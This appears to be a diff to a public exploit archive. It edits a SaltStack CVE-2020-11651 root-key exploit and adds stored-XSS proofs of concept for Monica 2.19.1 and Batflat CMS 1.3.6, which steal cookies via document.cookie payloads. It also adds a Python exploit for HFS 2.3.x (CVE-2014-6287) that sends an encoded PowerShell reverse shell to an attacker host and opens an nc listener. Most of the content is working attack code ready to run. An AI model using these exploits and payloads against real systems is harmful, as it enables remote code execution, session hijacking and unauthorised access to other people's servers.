diff --git a/exploits/multiple/remote/48421.txt b/exploits/multiple/remote/48421.txt
index 5bd051b35..6aa455263 100644
--- a/exploits/multiple/remote/48421.txt
+++ b/exploits/multiple/remote/48421.txt
@@ -48,16 +48,6 @@ def init_minion(master_ip, master_port):
 
 # --- check funcs ----
 
-def check_salt_version():
-  print("[+] Salt version: {}".format(salt.version.__version__))
-
-  vi = salt.version.__version_info__
-
-  if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):
-     return True
-  else:
-     return False
-
 def check_connection(master_ip, master_port, channel):
   print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='')
   sys.stdout.flush()
@@ -74,21 +64,21 @@ def check_connection(master_ip, master_port, channel):
 def check_CVE_2020_11651(channel):
   print("[+] Checking if vulnerable to CVE-2020-11651... ", end='')
   sys.stdout.flush()
-  # try to evil
+
   try:
     rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)
-  except salt.exceptions.SaltReqTimeoutError:
-    print("YES")
   except:
-    print("ERROR")
-    raise
+    print('ERROR')
+    return None
   else:
-      pass
+    pass
   finally:
     if rets:
+      print('YES')
       root_key = rets[2]['root']
       return root_key
 
+  print('NO')
   return None
 
 def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):
@@ -334,18 +324,11 @@ def main():
 
     channel = init_minion(args.master_ip, args.master_port)
 
-    if check_salt_version():
-       print("[ ] This version of salt is vulnerable! Check results below")
-    elif args.force:
-       print("[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.")
-    else:
-       sys.exit()
-
     check_connection(args.master_ip, args.master_port, channel)
     
     root_key = check_CVE_2020_11651(channel)
     if root_key:
-        print('\n[*] root key obtained: {}'.format(root_key))
+        print('[*] root key obtained: {}'.format(root_key))
     else:
         print('[-] Failed to find root key...aborting')
         sys.exit(127)
diff --git a/exploits/multiple/webapps/49582.txt b/exploits/multiple/webapps/49582.txt
new file mode 100644
index 000000000..373791be2
--- /dev/null
+++ b/exploits/multiple/webapps/49582.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Monica 2.19.1 - 'last_name' Stored XSS
+# Date: 22-02-2021
+# Exploit Author: BouSalman
+# Vendor Homepage: https://www.monicahq.com/
+# Software Link: https://github.com/monicahq/monica/releases
+# Version: Monica 2.19.1
+# Tested on: Ubuntu 18.04
+# CVE : CVE-2021-27370
+
+POST /people HTTP/1.1
+Host: 192.168.99.162
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 199
+Origin: http://192.168.99.162
+Connection: close
+Referer: http://192.168.99.162/people/add
+Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IjZBQ21CelczS1ZxS1dmMkNxWFBqN1E9PSIsInZhbHVlIjoiME01aDNSS2FHQ1lZdS9KSVlSL1pKdC9qcHRWRDVveWFvb0ZkUFB4cFlaSDhEclB3SG9UQ3BISzVoWFdYQUYrVkdpUVNkRUNlbUxFOTEyOC9Vb1ZaWFZTblpGOWlRVW9PR0FmSVhyL3JwUmgweU9hODlJWU5vNmQ3aDcrT084MjBoQU5Ednh0TWJ6dmxwS2NadFovMEdveko1V0RvbThXT2Jram1JVW5LcXdqUzl4alVBRDFBYXNjSEt3amRxbVFvQ3pMMGJZU2owWTZzWVp1ZURTNUtoRUlJMnVrV3NiVHRNRTU5YysvLzl2Zz0iLCJtYWMiOiI5MTc2NDAwZTY4NjVmZDg3NjM1YjY3NDRiMzFhMmRiYzIwMjFhODU4YWQyOWUwZmQzOTBlY2Y1ZTI0ODdiNzVkIn0%3D; laravel_token=eyJpdiI6InIwQ2RlQW9FRG5lanlOZmlXWXBRVEE9PSIsInZhbHVlIjoiUHhPNmZneXUydGVCZHlVMEI5cHpiTWI2OE5qajN5UVJXUmJHSFV1VGgya2NEbEJ6T3N0QVhKeUZwU0R4a05HWTgwNTNidTk4aGNXc3UzejY4WDJnaUJ0VUp1ekQ5cjVDc0hLSWpGTzc1ZWRRQ05Yem0vK3RZdEpOVHNQeE4rQ1orbXNJTXhWczJnMENYeGp6Q3NnOGU5TXhpZDd1bS9wRlBZS0xsYmpLSXJiMHhSVmU2NnBUMjdYS1RTQmJrNkU4cWNtZGJVdjFpaXp5a2YzdVZsWWxQMjBicDQxUGFjZlhGbmhCOHl2MkVXdzRoalNtbE9xL010clpZMGJNVmVQNWUzQlpsRFVKamlWQ2Jydk9sZWg3cHNKWVIvRW92alp0YURJcllXa08rTjA4Y2lvVzNHTXBrem11Q21xaW92cEwiLCJtYWMiOiI1YjM5NzViODhjNTk5MWUzNWFjZDg0ZWZmNjk1NjE3MzhhN2M0NGFjNWE3MzMyMGFhNTI2ZjgxMjE4OTRjZDg4In0%3D; XSRF-TOKEN=eyJpdiI6IkZFY1FLVEJFRXJMOWh6Vll1SW51akE9PSIsInZhbHVlIjoiRTVLRFZnOEovNk9XeFB2bXFQZnFlM0FxRU9QMVRxaHRhS3RzOHNpWm45K0xXV1FsbWhzV0RxUWd6bStxVXFBTHF1WlkrSklnSXoxbkFXK1JNcURhUHp6eTFOUHdLclFkTTEvUFhtTDgzVHA2RElFNnVuOWVyRGxCSGJmdzhJOXciLCJtYWMiOiIxOWNlMjkxMjM5ZTlmMDFiZjhiM2VlZjZjZmNmMmFmZDA4MzcyZjc3Yzg2MmQ2MWIwNTY2OTZlNjQyZDkzMjA0In0%3D; laravel_session=eyJpdiI6InBtUThtUFE1RzdvbW40ay8wdWJraXc9PSIsInZhbHVlIjoiS1hoVlJoNzFrYlpBUGRTL2V0YzVDRlR6dHl6NE12NjFxVTEvbXQwYTJnRUwyY3VQc2hOeWlkbUdyeEx5aDBnYlJER1BnbW52RXR0QWs1ZG00eWg0U2JNb3dIRTQ0aU9HK0JnTzE5eXQwUGlzbDNsbVFVa3RabWVQVzF4OXJsUTMiLCJtYWMiOiI3YmQwZDFkYjAwMzdlZTllODAzYjZmNzQ2YWI5NTMzMDY0ZWIzMWIyOWI4MjM4ODMzMDdhNjc2YTE4ZDViZDg0In0%3D
+Upgrade-Insecure-Requests: 1
+
+_token=afJRD6VqgCxIze3tGcCqzyeb3YaFka3fvjqV9YOx&first_name=XSS+POC&middle_name=&last_name=%7B%7B+constructor.constructor%28%22alert%28document.cookie%29%22%29%28%29+%7D%7D&nickname=&gender=&save=true
\ No newline at end of file
diff --git a/exploits/php/webapps/49583.txt b/exploits/php/webapps/49583.txt
new file mode 100644
index 000000000..5551a32ac
--- /dev/null
+++ b/exploits/php/webapps/49583.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS
+# Date: 22/02/2021
+# Exploit Author: Tadjmen
+# Vendor Homepage: https://batflat.org/
+# Software Link: https://github.com/sruupl/batflat/archive/master.zip
+# Version: 1.3.6
+# Tested on: Xammpp on Windows, Firefox Newest
+# CVE : N/A
+
+Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6
+
+Login with editor account with rights to Navigation, Galleries, Snippets
+
+Navigation
+- Add link
+payload: "><img src=x onerror=alert(document.cookie)>
+
+Galleries
+- Add gallery
+payload: mlem"><svg/onload=alert(1)>
+
+Snippets
+- Add Snippets
+payload: mlem"><svg/onload=alert("TuongNC")>
+
+More information:
+https://github.com/sruupl/batflat/issues/105
\ No newline at end of file
diff --git a/exploits/windows/remote/49584.py b/exploits/windows/remote/49584.py
new file mode 100755
index 000000000..f8d537544
--- /dev/null
+++ b/exploits/windows/remote/49584.py
@@ -0,0 +1,50 @@
+# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
+# Google Dork: intext:"httpfileserver 2.3"
+# Date: 20/02/2021
+# Exploit Author: Pergyz
+# Vendor Homepage: http://www.rejetto.com/hfs/
+# Software Link: https://sourceforge.net/projects/hfs/
+# Version: 2.3.x
+# Tested on: Microsoft Windows Server 2012 R2 Standard
+# CVE : CVE-2014-6287
+# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
+
+#!/usr/bin/python3
+
+import base64
+import os
+import urllib.request
+import urllib.parse
+
+lhost = "10.10.10.1"
+lport = 1111
+rhost = "10.10.10.8"
+rport = 80
+
+# Define the command to be written to a file
+command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()'
+
+# Encode the command in base64 format
+encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
+print("\nEncoded the command in base64 format...")
+
+# Define the payload to be included in the URL
+payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'
+
+# Encode the payload and send a HTTP GET request
+encoded_payload = urllib.parse.quote_plus(payload)
+url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
+urllib.request.urlopen(url)
+print("\nEncoded the payload and sent a HTTP GET request to the target...")
+
+# Print some information
+print("\nPrinting some information for debugging...")
+print("lhost: ", lhost)
+print("lport: ", lport)
+print("rhost: ", rhost)
+print("rport: ", rport)
+print("payload: ", payload)
+
+# Listen for connections
+print("\nListening for connection...")
+os.system(f'nc -nlvp {lport}')
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3d2865ad7..d38b8bb4f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18354,6 +18354,7 @@ id,file,description,date,author,type,platform,port
 48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows,
 48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple,
 48421,exploits/multiple/remote/48421.txt,"Saltstack 3000.1 - Remote Code Execution",2020-05-05,"Jasper Lievisse Adriaanse",remote,multiple,
+49584,exploits/windows/remote/49584.py,"HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)",2021-02-23,Pergyz,remote,windows,
 48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple,
 48491,exploits/php/remote/48491.rb,"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)",2020-05-19,Metasploit,remote,php,
 48508,exploits/multiple/remote/48508.rb,"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)",2020-05-22,Metasploit,remote,multiple,
@@ -43140,6 +43141,7 @@ id,file,description,date,author,type,platform,port
 48417,exploits/php/webapps/48417.txt,"Fishing Reservation System 7.5 - 'uid' SQL Injection",2020-05-05,Vulnerability-Lab,webapps,php,
 48419,exploits/php/webapps/48419.txt,"Online Scheduling System 1.0 - 'username' SQL Injection",2020-05-05,"Saurav Shukla",webapps,php,
 48420,exploits/php/webapps/48420.txt,"webERP 4.15.1 - Unauthenticated Backup File Access",2020-05-05,Besim,webapps,php,
+49582,exploits/multiple/webapps/49582.txt,"Monica 2.19.1 - 'last_name' Stored XSS",2021-02-23,BouSalman,webapps,multiple,
 48423,exploits/php/webapps/48423.txt,"PhreeBooks ERP 5.2.5 - Remote Command Execution",2020-05-05,Besim,webapps,php,
 48424,exploits/php/webapps/48424.txt,"SimplePHPGal 0.7 - Remote File Inclusion",2020-05-05,h4shur,webapps,php,
 48425,exploits/hardware/webapps/48425.txt,"NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration",2020-05-05,"Cold z3ro",webapps,hardware,
@@ -43180,6 +43182,7 @@ id,file,description,date,author,type,platform,port
 49576,exploits/php/webapps/49576.txt,"Online Exam System With Timer 1.0  - 'email' SQL injection Auth Bypass",2021-02-19,"Suresh Kumar",webapps,php,
 49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",2021-02-19,"Kamil Breński",webapps,multiple,
 49580,exploits/php/webapps/49580.txt,"Beauty Parlour Management System 1.0 - 'sername' SQL Injection",2021-02-19,"Thinkland Security Team",webapps,php,
+49583,exploits/php/webapps/49583.txt,"Batflat CMS 1.3.6 - 'multiple' Stored XSS",2021-02-23,Tadjmen,webapps,php,
 48466,exploits/php/webapps/48466.txt,"Tryton 5.4 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
 48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
 48468,exploits/php/webapps/48468.py,"Complaint Management System 1.0 - 'username' SQL Injection",2020-05-14,"Daniel Ortiz",webapps,php,